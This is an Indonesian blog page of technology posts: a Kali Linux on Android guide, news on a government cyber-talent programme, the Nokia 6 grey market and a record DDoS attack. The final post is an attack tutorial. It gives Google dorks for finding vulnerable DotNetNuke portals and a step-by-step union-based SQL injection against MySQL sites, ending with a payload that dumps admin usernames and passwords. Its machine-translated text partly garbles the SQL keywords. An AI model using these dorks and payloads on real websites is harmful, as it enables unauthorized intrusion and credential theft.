Pages
“Tidaklah engkau menceritakan sesuatu kepada suatu kaum sedang akal mereka tidak mampu menerimanya, melainkan cerita itu menimbulkan fitnah pada sebagian dari mereka.” (HR. Muslim).
Showing posts with label Info Teknologi. Show all posts
Showing posts with label Info Teknologi. Show all posts

Cara Install Kali Linux di Android

 

Hacking dengan Kali Linux, hacking menjadi lebih mudah karena Anda memiliki lebih dari 300 tools hacking

 dalam artikel kali ini Anda akan mengubah perangkat android Anda menjadi hacker hanya dengan menggunakan mobile

 Alat

 Sebuah perangkat yang menjalankan Android 2.1 atau di atas nya
Setidaknya 5 GB ruang bebas pada penyimpanan internal atau eksternal.
Sebuah cepat, koneksi internet nirkabel.
Kesabaran untuk menunggu distribusi untuk bootstrap dari jaringan.

 KONFIGURASI LINUX Deploy UNTUK KALI

  sebenarnya sangat sedikit yang bisa dilakukan untuk mendapatkan Kali diinstal.
Dengan memilih Kali Linux dalam "Distribusi" tab, Anda sudah cukup banyak menutupi hal-hal penting. Opsional, Anda dapat memilih arsitektur anda, pastikan cermin Kali benar, menetapkan jenis instalasi Anda dan lokasi pada perangkat Android Anda, dll Secara umum, default yang disediakan oleh Linux Deploy baik untuk memulai dengan.

BANGUNAN KALI IMAGE

 Setelah Anda menyelesaikan semua pengaturan, klik "install" tombol akan memulai Kali Linux bootstrap langsung dari repositori kami. Tergantung pada kecepatan koneksi internet Anda,
proses ini bisa memakan waktu cukup lama.
 Anda akan men-download basis instalasi Kali Linux (tanpa alat) minimal.

INI Syarat Bisa Direkrut Oleh Tim Cyber Indonesia

 


Program Born To Control yang didukung Kementerian Komunikasi dan Informatika telah diresmikan. Program ini untuk mencari “tentara” siber kategori “freak” atau aneh dan tidak normal. Direktur Jenderal Aplikasi Informatika Kementerian Komunikasi dan Informatika, Semuel Abrijani Pangerapan, mengungkapkan hal tersebut dalam peluncuran program Born To Control.

 "Kalau di dunia kreatif itu namanya hipster, kalau hacker itu yang jago coding, dan di bisnis ada hustler. Born To Control itu bukan arti mengontrol kegiatan masyarakat, justru menemukan talenta di cyber security," ujar Semuel, Senin 30 Januari 2017. Semuel menceritakan, Sumber Daya Manusia dengan kemampuan di bidang keamanan siber harus dimiliki sebuah negara. Sebab, keamanan perlu didapat seiring meningkatnya industri seperti e-commerce sampai e-government.

 "Masalah security itu genting. Industri sudah mulai besar kalau tanpa security, e-commerce atau e-government bisa kena masalah," kata dia. Kominfo menyebutkan 10 ribu “tentara” siber ini dijaring dari 10 kota di seluruh Indonesia, yaitu Medan, Palembang, Jakarta, Bandung, Yogyakarta, Malang, Bali, Samarinda, Makassar, dan Manado.

 Bagi yang berminat, para kandidat ini harus minimal usianya 17 tahun yang tertarik soal keamanan siber dan melatihnya ke tingkat lebih lanjut lagi sehingga masuk kategori ahli. Diharapkan dari 10 kota itu, dapat menyerap masing-masing kota calon 1.000 “tentara” siber.

 Setelah itu akan disaring lagi menjadi 100 orang yang akan dilatih menjadi ahli keamanan siber. “100 orang ini akan masuk ke Digicamp. Pembentukan “tentara” siber ini untuk mengarahkan agar mereka tak hanya membela diri sendiri tapi juga negara," tutur Chariman Program Born To Control, Eva Noor.

Kominfo menyebutkan 10 ribu “tentara” siber ini dijaring dari 10 kota di seluruh Indonesia, yaitu Medan, Palembang, Jakarta, Bandung, Yogyakarta, Malang, Bali, Samarinda, Makassar, dan Manado.

Bagi yang berminat, para kandidat ini harus minimal usianya 17 tahun yang tertarik soal keamanan siber dan melatihnya ke tingkat lebih lanjut lagi sehingga masuk kategori ahli.

Diharapkan dari 10 kota itu, dapat menyerap masing-masing kota calon 1.000 “tentara” siber. Setelah itu akan disaring lagi menjadi 100 orang yang akan dilatih menjadi ahli keamanan siber.

“100 orang ini akan masuk ke Digicamp. Pembentukan “tentara” siber ini untuk mengarahkan agar mereka tak hanya membela diri sendiri tapi juga negara," tutur Chariman Program Born To Control, Eva Noor.

Sumber : viva.co.id

Tentara Cyber Indonesia

 

Indonesia mengalami darurat soal Sumber Daya Manusia (SDM) di bidang cyber security. Padahal sejumlah negara telah memiliki tenaga cyber security dengan angka yang cukup besar.

 Disampaikan Chairman Program Born To Control, Eva Noor, negara-negara di Eropa, Amerika Serikat, hingga Kanada, jumlah SDM di bidang cyber security sudah mencapai angka 15 juta.

 "Idealnya Indonesia harus punya 10 persennya (dari 15 juta) cyber security agar terbilang pas," ujar Eva ditemui usai meluncurkan Program Born To Control di Gedung Kementerian Komunikasi dan Informatika (Kominfo), Senin, 30 Januari 2017.

 Eva menuturkan bahwa saat ini mahasiswa yang berada di jurusan Teknologi Informasi (TI) itu ada 400 ribu orang di seluruh Indonesia. Namun, setelah lulus mereka seperti kehilangan arah dengan tidak memanfaatkan keahlian mereka.

 Kata Eva, sudah cukup banyak SDM dilihat dari jumlah mahasiswa tersebut. Tetapi yang berkualitas dari mahasiswa (TI) itu memiliki kendala-kendala lainnya, sehingga terjadinya gap (jarak).

 "Para hacker ini mager atau tidak mau muncul, lalu kendala lainnya tidak tersertifikasi, hingga tidak nyaman dengan lingkungan kerja," ucapnya.

 Untuk itu, melalui program Born To Control dapat menjaring cyber security dari berbagai daerah di Indonesia. Dengan mencari 10 ribu kandidatnya, diharapkan dapat menjaring 100 orang yang terbilang ahli di bidang cyber security.

 "Nanti mereka dilatih, dibimbing, dan dipertemukan kepada pelaku industri untuk disalurkan. Jadi, cyber security ini disalurkan untuk mengantisipasi cyber war tapi juga kebutuhan industri," tuturnya

 Sumber : viva.co.id

Bangkit Dari Kubur, Perusahaan Nokia meluncurkan Nokia 6 pada awal tahun ini

 

Setelah resmi memegang lisensi atas brand Nokia, HMD global meluncurkan Nokia 6 pada awal tahun ini sebagai smartphone Android pertama yang menandai kembalinya Nokia ke industri smartphone. Namun, hingga saat ini, HMD Global masih mengatakan jika Nokia 6 merupakan smartphone eksklusif negara Cina.

 Hal ini menimbulkan kecemburuan penggemar Nokia 6 di belahan dunia lain. Karena tak bisa masuk secara legal atau resmi, maka jalur ilegal atau ‘black market’ ditempuh para distributor untuk menghadirkan unit Nokia 6 di sejumlah negara, termasuk Indonesia. Beberapa smartphone yang tidak resmi namun laris di Indonesia adalah smartphone Xiaomi dan iPhone seri terbaru.

 Baru-baru ini, unit Nokia 6 telah menampakan diri di situs jual beli online Bukalapak dan Tokopedia. Kedua e-commerce tersebut memang terkenal menyediakan unit smartphone yang didatangkan oleh distibutor secara tidak resmi. Menurut pantauan Beritateknologi.com, ada beberapa lapak yang menawarkan Nokia 6 dengan harga yang berbeda-beda. Beberapa lapak menggunakan sistem pre-order selama 15 hari. Bicara soal harga, jelas saja jika harga yang ditawarkan terlalu melambung tinggi jika dibandingkan dengan harga resminya di Cina. Unit yang tersedia di Tokopedia dan Bukalapak dibanderol di kisaran harga Rp5,1 jutaan hingga Rp5,9 jutaan.

  Sementara untuk harga resminya di Cina, Nokia 6 hanya dibanderol seharga 1,699 Yuan atau setara dengan Rp3,2 jutaan. Tak hanya di Indonesia, sebelumnya unit Nokia 6 juga hadir di negara tetangga Filipina. Bedanya, e-commerce yang menyediakan unit Nokia 6 adalah Lazada Filipina. Selain itu, unit yang tersedia di negara tersebut hanya varian warna putih. Di Filipina, Nokia 6 dibanderol dengan harga yang tidak jauh beda dengan Indonesia, yakni seharga 18.590 Peso atau sekitar Rp4,9 jutaan.

 Sumber : www.beritateknologi.com

Serangan DDoS Terbesar didunia yaitu sebesar 1Tbps

 




Singkat Bytes: Hosting penyedia OVH telah menyaksikan dunia serangan DDoS terbesar. Serangan ini intensitas 1Gpbs diluncurkan oleh jaringan botnet dari 152.463 perangkat pintar. Jaringan yang sama juga bertanggung jawab untuk DDoS baru-baru ini serangan terhadap publikasi keamanan Krebs Pada Keamanan. Sayangnya, lebih dari 15k kamera baru telah berpartisipasi dalam serangan di OVH dalam 48 jam terakhir.

sepertinya kita memiliki rekor baru untuk serangan DDoS terbesar yang pernah dilihat. Kali ini, serangan itu telah berhasil menyentuh tanda 1Tbps magis. Serangan ini dihadapi pekan lalu oleh penyedia hosting OVH. Pendiri OVH dan CTO Oktaf Klaba berbagi screenshot dari berbagai sumber serangan yang sedang berlangsung.

Pesan Klaba mengungkapkan bahwa website OVH ini dibanjiri dengan torrent besar lalu lintas pada 20 September itu mengklaim bahwa lebih dari 25 serangan DDoS kolosal yang dihadapi oleh perusahaan dalam 48 jam.

Klaba juga menambahkan informasi lebih lanjut bahwa serangan itu telah clock dari jaringan 152.463 hack kamera bertenaga rendah dan perangkat pintar. Kapasitas Serangan keseluruhan botnet sedang diperkirakan 1.5Tbps.

jaringan botnet yang sama juga melumpuhkan publikasi keamanan Krebs Pada Keamanan dengan intensitas 620Gbps. Akhirnya, Krebs mendapat bantuan dari Google Project Shield untuk melindungi situs web. Krebs mengambil langkah ini setelah Akamai menarik dukungan mahal, dengan mengatakan bahwa DDoS adalah "hampir dua kali lipat ukuran serangan terbesar mereka lihat sebelumnya."

Situasi saat OVH tidak baik. Baru-baru ini, Klaba tweeted bahwa beberapa perangkat IOT baru telah berpartisipasi dalam serangan DDoS.

Memiliki sesuatu untuk menambahkan? Jangan lupa untuk menjatuhkan pandangan dan umpan balik di bagian komentar di bawah ini.

redaksi : https://fossbytes.com

Portal Hacking (DNN) Teknik/SQL Injection di MySQL Database

 


        Salah satu metode hacking yang lebih disebut "Portal Hacking (DNN)". Metode ini juga menggunakan di google mesin pencari untuk menemukan situs hackable .. Di sini U dapat menggunakan hanya Google Dorks untuk
hacking website ..

Di sini U dapat menggunakan dez dua Google Dorks

1- inurl: "/ portal / 0"

2- inurl: /tabid/36/language/en-US/Default.aspx


Anda juga dapat memodifikasi google dork ini sesuai dengan kebutuhan Anda & persyaratan

Berikut adalah mengeksploitasi
Penyedia / HtmlEditorProviders / FCK / fcklinkgallery.aspx

Langkah 1:
http://www.google.com

Langkah 2:
Sekarang masukkan dork ini
: inurl: /tabid/36/language/en-US/Default.aspx
ini adalah dork untuk menemukan situs Rentan Portal, gunakan dengan bijak.


Langkah 3:
Anda akan menemukan banyak situs, Pilih situs yang Anda merasa nyaman dengan.

Langkah 4:
Misalnya mengambil situs ini.

http://www.abc.com/Home/tabid/36/Lan...S/Default.aspx

Langkah 5: Sekarang ganti
/Home/tabid/36/Language/en-US/Default.aspx

dengan ini
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
=======================================================================

SQL Injection di MySQL Database: -

Serangan SQL Injection adalah suntikan kode yang mengeksploitasi lapisan database aplikasi. Ini adalah paling sering database MySQL, tapi ada teknik untuk melakukan serangan ini dalam database lain seperti Oracle. Dalam tutorial ini saya akan menunjukkan langkah-langkah untuk melakukan serangan pada database MySQL.

Langkah 1:
Ketika pengujian website untuk kerentanan SQL Injection, Anda perlu menemukan halaman yang terlihat seperti ini:
www.site.com/page=1

atau
www.site.com/id=5

Pada dasarnya situs perlu memiliki = maka nomor atau string, tetapi paling sering nomor. Setelah Anda telah menemukan halaman seperti ini, kami menguji kerentanan hanya dengan memasukkan sebuah 'setelah nomor di url. Sebagai contoh:

www.site.com/page=1 '

Jika database rentan, halaman akan meludahkan kesalahan MySQL seperti;

Peringatan: mysql_num_rows (): argumen yang diberikan bukan merupakan hasil resource MySQL yang valid di /home/wwwprof/public_html/readnews.php on line 29

Jika beban halaman seperti biasa maka database tidak rentan, dan website ini tidak rentan terhadap SQL Injection.

Langkah 2

Sekarang kita perlu menemukan jumlah kolom serikat dalam database. Kami melakukan ini dengan menggunakan "order by" perintah. Kami melakukan ini dengan memasukkan "order by 1--", "order by 2--" dan seterusnya sampai kita menerima kesalahan halaman. Sebagai contoh:

Agar www.site.com/page=1 oleh 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

Jika kita menerima kesalahan MySQL lain di sini, maka itu berarti kita memiliki 4 kolom. Jika situs errored pada "order by 9" maka kita akan memiliki 8 kolom. Jika ini tidak berhasil, bukan - setelah nomor, mengubahnya dengan / *, karena mereka adalah dua prefiks perbedaan dan jika salah satu bekerja yang lain cenderung tidak terlalu. Ini tergantung pada cara database dikonfigurasi untuk yang awalan digunakan.

Langkah 3

Kita sekarang akan menggunakan "serikat" perintah untuk menemukan kolom rentan. Jadi kita masuk setelah url, serikat semua pilih (jumlah kolom) -,
sebagai contoh:
serikat www.site.com/page=1 semua pilih 1,2,3,4--

Ini adalah apa yang akan kita masukkan jika kita memiliki 4 kolom. Jika Anda memiliki 7 kolom yang akan menempatkan, serikat semua pilih 1,2,3,4,5,6,7-- Jika hal ini dilakukan berhasil halaman harus menunjukkan beberapa nomor di suatu tempat pada halaman. Sebagai contoh, 2 dan 3. Ini berarti kolom 2 dan 3 rentan.


Langkah 4

Kita sekarang perlu untuk menemukan versi database, nama dan pengguna. Kami melakukan hal ini dengan mengganti nomor kolom rentan dengan perintah berikut:
user ()
database ()
Versi ()
atau jika ini tidak bekerja mencoba ...
@@Pengguna
@@Version
@@Database

Misalnya url akan terlihat seperti:
serikat www.site.com/page=1 semua pilih 1, pengguna (), versi (), 4--

Halaman yang dihasilkan kemudian akan menunjukkan pengguna database dan kemudian versi MySQL. Misalnya admin @ localhost dan MySQL 5.0.83.
PENTING: Jika versi adalah 5 dan di atas baca terus untuk melakukan serangan, jika 4 dan di bawah, Anda harus memaksa hewan atau menebak nama tabel dan kolom, program dapat digunakan untuk melakukan hal ini.

Langkah 5

Dalam langkah ini tujuan kami adalah untuk membuat daftar semua nama tabel dalam database. Untuk melakukan hal ini kita masukkan perintah berikut setelah url.
UNION SELECT 1, table_name, 3,4 DARI information_schema.tables--
Jadi url akan terlihat seperti:
www.site.com/page=1 UNION SELECT 1, table_name, 3,4 DARI information_schema.tables--

Ingat "table_name" masuk dalam kolom nomor rentan Anda temukan sebelumnya. Jika perintah ini dimasukkan dengan benar, halaman harus menunjukkan semua tabel dalam database, sehingga mencari tabel yang berisi informasi yang berguna seperti password, sehingga mencari tabel admin atau tabel anggota atau pengguna.

Langkah 6
Pada Langkah ini kita ingin daftar semua nama kolom dalam database, untuk melakukan hal ini kita gunakan perintah berikut:

serikat semua pilih 1,2, group_concat (column_name), 4 dari information_schema.columns mana TABLE_SCHEMA = database () -
Jadi url akan terlihat seperti ini:
serikat www.site.com/page=1 semua pilih 1,2, group_concat (column_name), 4 dari information_schema.columns mana TABLE_SCHEMA = database () -
Perintah ini membuat halaman meludahkan semua nama kolom dalam database. Jadi sekali lagi, mencari nama-nama yang menarik seperti user, email dan password.

Langkah 7

Akhirnya kita perlu membuang data, sehingga mengatakan kami ingin mendapatkan "username" dan bidang "password", dari tabel "admin" kita akan menggunakan perintah berikut,
serikat semua pilih 1,2, group_concat (username, 0x3a, password), 4 dari admin--
Jadi url akan terlihat seperti ini:
www.site.com/page=1 serikat semua pilih 1,2, group_concat (username, 0x3a, password), 4 dari admin--

Di sini "concat" perintah sesuai username dengan password sehingga Anda tidak perlu menebak, jika perintah ini berhasil maka Anda harus disajikan dengan halaman penuh username dan password dari website


 T.I Sniper
Get updates in your email box

Complete the form below, and we'll send you our recent update.

Deliver via FeedBurner
© Copyright 2015 sampaikanlah kebenaran walau hanya satu ayat. Designed by Bloggertheme9. Powered by 3l-muh4j1m1.